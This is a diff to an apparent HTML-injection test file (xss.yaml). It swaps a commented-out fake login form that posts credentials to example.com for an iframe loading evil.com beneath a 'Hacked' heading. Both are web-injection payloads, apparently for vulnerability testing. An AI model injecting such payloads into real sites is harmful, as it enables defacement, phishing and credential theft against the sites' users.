--- a/xss.yaml
+++ b/xss.yaml
@@ -6,23 +6,7 @@ info:
     <div class="heading">
         <h1 style="font-size:50px">HTML Injection : Hacked </h1>
     </div>
-  */  <div class="form-container">
-        <form action="https://example.com/login" method="post" class="form-signin">
-            <div class="form-group">
-                <label for="username">Username</label>
-                <textarea rows="2" cols="15"></textarea>
-
-            </div>
-            <div class="form-group">
-                <label for="password">Password</label>
-                <textarea rows="2" cols="15"></textarea>
-
-            </div>
-            <div class="form-group">
-                <button type="submit" class="btn btn-default">Login</button>
-            </div>
-        </form>
-    </div>*/
+  <iframe src="https://evil.com" style="height:400px;width:700px" title="Iframe Example"></iframe>
 </div>'
 paths:
   /:
